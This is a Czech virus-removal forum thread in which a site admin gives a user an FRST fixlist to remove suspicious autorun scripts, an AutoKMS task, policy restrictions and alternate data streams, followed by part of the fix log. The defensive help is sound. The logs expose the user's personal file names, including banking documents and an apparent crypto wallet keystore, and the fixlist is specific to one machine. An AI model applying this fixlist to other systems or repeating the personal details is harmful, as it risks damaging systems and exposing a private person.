Partition 3: (Not Active) - (Size=509 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 3 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)
==================== End of Addition.txt =======================
-
Rudy
- Site Admin
- Příspěvky: 118371
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu
Otevřte poznámkový blok a zkopírujte do něj:
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.Start
CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS
EmptyTemp:
Hosts:
End
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu
Fix result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 20:16:06) Run:1
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS
EmptyTemp:
Hosts:
End
*****************
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
C:\ProgramData\TEMP => ":0888F409" ADS removed successfully
C:\ProgramData\TEMP => ":3440EB47" ADS removed successfully
C:\ProgramData\TEMP => ":66633281" ADS removed successfully
C:\ProgramData\TEMP => ":93433455" ADS removed successfully
C:\Users\IRENA-PC\Downloads => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\102394978_1.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png => ":com.dropbox.attrs" ADS removed successfully
